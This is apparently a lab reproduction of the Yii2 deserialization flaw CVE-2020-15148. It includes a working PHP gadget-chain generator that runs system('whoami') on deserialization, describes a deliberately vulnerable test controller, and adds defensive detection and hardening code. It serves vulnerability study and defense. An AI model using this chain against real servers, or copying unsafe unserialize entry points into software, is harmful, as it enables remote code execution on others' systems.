Reproducing the Yii2 deserialization vulnerability (CVE-2020-15148)
For an easy install, download an older release from GitHub (https://github.com/yiisoft/yii2), extract the tgz into phpstudy's www directory and name the folder Yii2:
Note that the openssl PHP extension must be enabled before running php init to install Yii2, otherwise it fails. Once the install finishes, open the site in a browser to confirm it works:
POC (the serialized object is generated by this script; the stub classes only carry the property names and values that the real Yii2 and Faker classes have, so that serialize() emits the same string the target will read):
<?php
namespace yii\db;
// Entry of the chain: BatchQueryResult::__destruct() calls reset(), which calls close() on _dataReader
class BatchQueryResult extends \yii\base\BaseObject{
    private $_dataReader;
    public function __construct()
    {
        $this->_dataReader=new \Faker\Generator();
    }
}
namespace yii\base;
class BaseObject{
}
namespace yii\rest;
// IndexAction::run() calls checkAccess with id as argument
class Action{
    public $checkAccess='system';
    public $id='whoami';
}
class IndexAction extends Action{
}
namespace Faker;
// Generator::__call('close') looks up formatters['close'] and invokes it
class Generator{
    protected $formatters = array();
    public function __construct()
    {
        $this->formatters['close']=[(new \yii\rest\IndexAction()),"run"];
    }
}
use \yii\db\BatchQueryResult;
$c=new BatchQueryResult();
print(serialize($c));
The POP chain has already been worked out by others; what you still need is a deserialization entry point of your own, so create a new TestController.php under controllers:
First a quick test:
Then send the payload:
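For the defensive side of this reproduction, here is an added example (not code from the original post or from the Yii project) showing what a safe entry point looks like instead of the test controller's raw unserialize() of request data, plus the kind of __wakeup guard that, to my knowledge, the fixed release 2.0.38 added to BatchQueryResult. The function names findSerializedObjects, hardenedEntry and GuardedResult are hypothetical; the script runs stand-alone with plain PHP and needs no framework.

```php
<?php
// Added example, not part of the original post or of Yii2.
// Names below (findSerializedObjects, hardenedEntry, GuardedResult) are invented.

/**
 * List the class names of every object token O:<len>:"<name>" in a PHP
 * serialized string without unserializing it. Good for logging/detection:
 * a parameter that should only carry scalars or arrays but contains object
 * tokens is worth an alert.
 */
function findSerializedObjects(string $data): array
{
    preg_match_all('/O:\d+:"([^"]+)"/', $data, $m);
    return $m[1];
}

/**
 * Deserialize untrusted input without instantiating any class.
 * allowed_classes => false turns every object token into
 * __PHP_Incomplete_Class, so no __wakeup/__destruct/__call gadget can run.
 * Input containing object tokens is logged and rejected outright.
 */
function hardenedEntry(string $data)
{
    $classes = findSerializedObjects($data);
    if ($classes !== []) {
        error_log('rejected serialized input with objects: ' . implode(',', $classes));
        return null;
    }
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== 'b:0;') {
        return null; // malformed input
    }
    return $value;
}

/**
 * Library-side mitigation: a class that is never meant to be unserialized
 * refuses to wake up, so it cannot serve as the head of a gadget chain even
 * if some other code path unserializes untrusted data.
 */
class GuardedResult
{
    private $_dataReader;

    public function __wakeup()
    {
        throw new \BadMethodCallException('Cannot unserialize ' . __CLASS__);
    }
}

// Constructed sample inputs for a quick self-check.
$safe   = serialize(['user' => 'alice', 'page' => 2]);
$gadget = 'O:23:"yii\db\BatchQueryResult":1:{s:36:"' . "\0" . 'yii\db\BatchQueryResult' . "\0" . '_dataReader";N;}';

var_dump(hardenedEntry($safe));    // plain array comes back unchanged
var_dump(hardenedEntry($gadget));  // rejected before unserialize() is reached

try {
    unserialize(serialize(new GuardedResult()));
} catch (\BadMethodCallException $e) {
    echo 'guard fired: ' . $e->getMessage() . PHP_EOL;
}
```

In an actual Yii2 controller the same two functions would sit in front of whatever the action does with the request parameter; the wider lesson is that data from $_GET, $_POST or cookies should never reach unserialize() with classes allowed, and that JSON is the better transport when objects are not needed at all.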
References:
https://mp.weixin.qq.com/s/NHBpF446yKQbRTiNQr8ztA
https://github.com/yiisoft/yii2/